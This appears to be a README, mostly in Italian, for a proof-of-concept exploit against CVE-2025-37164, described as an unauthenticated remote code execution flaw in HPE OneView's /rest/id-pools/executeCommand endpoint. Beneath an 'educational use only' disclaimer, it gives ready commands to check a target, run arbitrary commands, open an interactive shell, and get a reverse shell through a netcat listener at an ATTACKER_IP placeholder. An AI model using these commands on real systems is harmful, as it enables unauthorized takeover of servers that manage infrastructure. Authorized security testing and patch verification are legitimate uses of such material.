
Exploit proof-of-concept per CVE-2025-37164, una vulnerabilità critica di esecuzione remota di codice non autenticata in HPE OneView tramite l'endpoint /rest/id-pools/executeCommand.
Exploit Proof-of-Concept per CVE-2025-37164, una vulnerabilità critica (CVSS 10.0) di esecuzione remota di codice non autenticata in HPE OneView.
QUESTO SOFTWARE È FORNITO SOLO A SCOPO EDUCATIVO E PER TEST DI SICUREZZA AUTORIZZATI.
Analisi tecnica: La vulnerabilità risiede nell'endpoint PUT /rest/id-pools/executeCommand che non richiede autenticazione e passa input controllato dall'utente direttamente a Runtime.exec().
requests (pip install requests)# Test if target is vulnerable
python3 cve-2025-37164.py -t http://target-ip --check
# Execute a single command
python3 cve-2025-37164.py -t http://target-ip -c "id"
# Interactive command shell
python3 cve-2025-37164.py -t http://target-ip -i
# Attempt reverse shell (requires listener)
# On attacker machine: nc -lvnp 4444
python3 cve-2025-37164.py -t http://target-ip --lhost ATTACKER_IP --lport 4444